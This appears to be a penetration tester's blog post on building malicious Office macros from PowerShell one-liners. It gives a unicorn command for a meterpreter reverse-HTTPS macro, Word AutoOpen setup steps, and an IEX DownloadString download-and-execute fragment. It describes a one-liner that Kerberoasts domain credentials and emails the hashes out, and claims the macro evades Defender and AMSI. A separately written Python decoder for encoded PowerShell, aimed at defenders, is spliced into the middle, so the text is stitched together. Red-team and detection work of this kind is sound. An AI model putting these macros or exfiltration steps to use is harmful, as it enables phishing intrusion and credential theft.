Office macros for years have been the choice of many as a mechanism to gain a foothold, and personally I have been using macros as a delivery method in pen tests for many years.
Let’s be honest, macro writing is tricky, and before the amazing and magical unicorn (https://github.com/trustedsec/unicorn), Empire (https://github.com/EmpireProject/Empire) and Veil (https://github.com/Veil-Framework/Veil-Evasion/blob/master/modules/payloads/auxiliary/macro_converter.py) came along, creating simulated malicious macros was a daunting task.
I like unicorn because it makes creating PowerShell payloads simple. To create an Office macro in unicorn you simply run the following:
root@kali:~/unicorn/v3.5.3# python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
A few seconds later two files are created: unicorn.rc, which can be used to configure the MSF handler, and powershell_attack.txt, which contains the macro. Open powershell_attack.txt and copy its contents, then open Word, go to Developer, Visual Basic, right-click on ThisDocument and choose Insert Module, and paste the contents of powershell_attack.txt in. One final tweak is required: the top line of the macro, Sub Auto_Open(), needs the underscore deleted so it reads Sub AutoOpen(). Your macro is then ready to be saved and used as required.
I had been using unicorn for a few years, and during that time I saw a few odd problems here and there, mostly down to formatting after updates, but nothing major. That was until I tried the Cobalt Strike macro option in unicorn v3.5.3: after creating it I pasted the macro output into Word 2010 and instantly got the following error: “Too many line continuations”. So I googled it and learned something.
Your code has more than 25 physical lines joined with line-continuation characters.
OK, so the output macro had more than 25 lines joined together. How did I try to fix this? Let’s look at an example.
Directly below is an extract of VBA code containing a base64-encoded string. The important part is the underscore at the end of the line combined with the & character at the start of the next line: that is a line continuation.
& "AIABsAHOAGEAbQBlACABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQB" _
If you have more than 25 of them you get the error and your macro won’t run.
So how do you fix this? Well, first I logged the above error on the unicorn GitHub page, https://github.com/trustedsec/unicorn/issues/96, and then I tried to manually tweak the macro.
Deleting the line continuations and rejoining the pieces into single lines should work, and while this idea sounded simple and in most cases it would work, it did not work with the output of the unicorn script. From labbing I later found out that there also seems to be a limit on line length in VB.
So this got me thinking: could I figure out how to write my own script to base64-encode a one-liner and output the result as a usable macro? The answer was yes. Was it complex? Yes. I’m happy to admit I’m no coding genius; lots went wrong, I swore a bit, but I learned a lot of things along the way.
The result (I don’t care what you all think lol) is a bash script (a wrapper, but I made it so I’m happy) that takes a PS one-liner and spits out an Office macro.
Have others made such a thing before? Yes, but trying to make something from scratch teaches you far more than googling for a finished solution.
Video showing it working.
I tried placing the bash script in here, but WP formats code horribly, so I placed it on GitHub.
To run it, simply type bash Macro.sh and then give it the file you want it to convert:
root@kali:~/Desktop# bash Macro.sh
Feed it your PS file: /root/Desktop/PS_OneLiner1
The PS one-liner I convert is the one at the link directly below;
To use the above you need a Gmail account. Make a test one, as you need to add credentials to the script to enable it to log in and send and receive emails (I get that it’s wrong to add credentials to a script, but this is a proof of concept, a lab idea: can you harvest DA creds and send them to a remote destination? The answer is yes). Also, under your test Google account you need to click on Security and tick “Less secure app access”; this allows devices to log in, in this case PowerShell, but it’s the same if you use Outlook with Gmail.
I have detailed the above one-liner before, see here: https://1337red.wordpress.com/powershell-one-liners-that-make-you-go-hmmm/. The Kerberoast script was created by @harmj0y and I use the one bundled with Empire. The email automation I painfully wrote myself, with sections taken from a mass of other blogs; the above one works in PSv2, which is what I was going for.
So what did I learn? Well, first off, when attempting to write a macro based on a PS script you get so many errors, so, so many errors, and you just want to cry and give up. This is down to the formatting: while you can run a simple command such as powershell.exe ipconfig /all > test.txt in VBA (and most examples on other blogs only show simple syntax like that), if you try to do something such as “powershell -ep bypass -c “IEX (New-Object System.Net.WebClient).DownloadString(‘ you’re in for a load of stress. So how do you fix this? Base64 the one-liner; this streamlines the formatting ;0) But it’s not quite that simple, I’m sorry to say: if you just base64 the one-liner, it won’t be encoded correctly for PS. To make it work you also need to set the destination charset to UTF-16LE. This proved to be a few hours of challenge; as with all sec problems, any answer creates more questions. Nod to byt3bl33d3r (love CME) for the following post on base64 PS
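The UTF-16LE detail above is exactly what an analyst needs when a macro or a process-creation log hands them a powershell -enc blob. The following is an added example, not the blog’s Macro.sh or anything from unicorn: it pulls the encoded argument out of a command line, decodes it the way PowerShell does (base64 of UTF-16LE text), reports when a blob was instead base64’d as plain UTF-8 (the mistake described above, which PowerShell would not run), and flags the usual download-and-execute keywords. The command lines, the payload string and the example.invalid URL are all constructed for the demo.

```python
import base64
import re

# Matches -EncodedCommand and its documented short forms (-e, -ec, -enc).
# The \b stops "-ep bypass" from being read as "-e" followed by "p".
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Keywords an analyst would flag in the decoded command (lower-cased for matching).
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string")


def decode_encoded_command(blob: str):
    """Return (encoding, text) for a -EncodedCommand value.

    PowerShell expects base64 of UTF-16LE text, so for ASCII-ish commands every odd
    byte is 0x00; that is the check used here. A blob without that pattern was most
    likely base64'd as UTF-8, which PowerShell rejects, but the text is still shown."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError: truncated or non-base64 blob
        return "invalid base64", None
    odd_bytes = raw[1::2]
    if len(raw) % 2 == 0 and odd_bytes and odd_bytes.count(0) * 2 > len(odd_bytes):
        return "utf-16-le", raw.decode("utf-16-le")
    return "utf-8 (would not run)", raw.decode("utf-8", errors="replace")


def triage_command_line(cmdline: str) -> dict:
    """Decode the encoded argument of one process command line and flag keywords."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return {"encoded": False, "encoding": None, "decoded": None, "flags": []}
    encoding, text = decode_encoded_command(m.group(1))
    flags = [s for s in SUSPICIOUS if text and s in text.lower()]
    return {"encoded": True, "encoding": encoding, "decoded": text, "flags": flags}


def _b64(text: str, encoding: str) -> str:
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# Constructed samples (not real logs): one encoded correctly for PowerShell, one with
# the UTF-8 mistake, one benign, one with a truncated blob as logs often have.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_CMDLINES = [
    "powershell.exe -ep bypass -w hidden -enc " + _b64(PAYLOAD, "utf-16-le"),
    "powershell.exe -ep bypass -EncodedCommand " + _b64(PAYLOAD, "utf-8"),
    "powershell.exe ipconfig /all",
    "powershell.exe -e SQBFAFgAI",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage_command_line(line))
```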
So I tested the above on a Windows 7 VB machine. I still find Windows 10 slower to use, but for completeness I also tested it on Windows 10 with Defender on.
Microsoft Windows [Version 10.0.16299.846]
(c) 2017 Microsoft Corporation. All rights reserved.
Host Name: WIN10AD
OS Name: Microsoft Windows 10 Enterprise Evaluation
OS Version: 10.0.16299 N/A Build 16299
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Defender settings – Updated on day of testing, Threat definition version 1.283.488.0.
And I still received the email with the hashes, so it bypasses AMSI.
If you got this far, cheers for reading, and sorry no refunds on the 10 mins of life you spent reading this. Now go lab something ;0)